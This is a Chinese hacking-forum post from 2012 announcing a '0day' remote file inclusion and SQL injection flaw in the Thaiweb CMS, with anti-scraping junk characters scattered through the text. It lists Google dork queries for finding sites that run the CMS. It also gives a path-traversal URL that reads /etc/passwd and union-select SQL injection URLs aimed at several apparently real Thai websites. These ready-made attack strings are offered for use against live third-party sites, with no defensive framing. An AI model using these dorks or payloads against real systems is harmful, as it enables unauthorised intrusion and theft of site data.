找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2348|回复: 0
打印 上一主题 下一主题

Thaiweb远程文件sql注入漏洞0day

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-27 08:38:39 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Google之:9 p2 ^4 Y+ M) i3 `

5 e  A% T# T5 P) \& Vintext:powered by Thaiweb
6 n0 U1 U7 |; ~' d7 w* ?9 {  V* y  Z' l/ w" Q: A  F$ p2 j
inurl:index.php?page=board.php
8 s% f' L, \" W" P; M$ _+ n5 m
8 U: w' V- Q+ o$ r3 H( J+ Y4 V , V/ k6 N; K( L0 `5 H' C4 @& y) E" I

- e9 Z" D2 s6 q- a( ~利用点1:http://www.xfack.com/index.php?p ... ../../../etc/passwd+ n6 Z: _6 v4 R7 P
4 O! }0 y! z9 b

; P: K! [) `  r1 H4 Q4 q8 `6 P( H2 ?8 ^' g4 E) i
利用点2:http://www.xfack.com/index.php?page=boardque.php&bod_id=4'" n" @5 k0 h3 ^" j9 V4 Y" d% H

4 d& r" p" q' k' |
* A2 X" _  S3 F+ f0 r+ a8 K8 H# h; @( |
http://www.keytasin.com//index.p ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--, z- O+ ~2 O% g" Z$ L

5 W3 o* r( X- P- N7 Phttp://www.autopartnerthailand.c ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--; g: D4 s7 ~2 I: l5 @
4 \0 O( D$ E* Z1 B! J! w' }' X" r
http://gift.in.th/index.php?page ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
( S0 _: k% t! ]) b0 u+ @. T2 O4 E
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表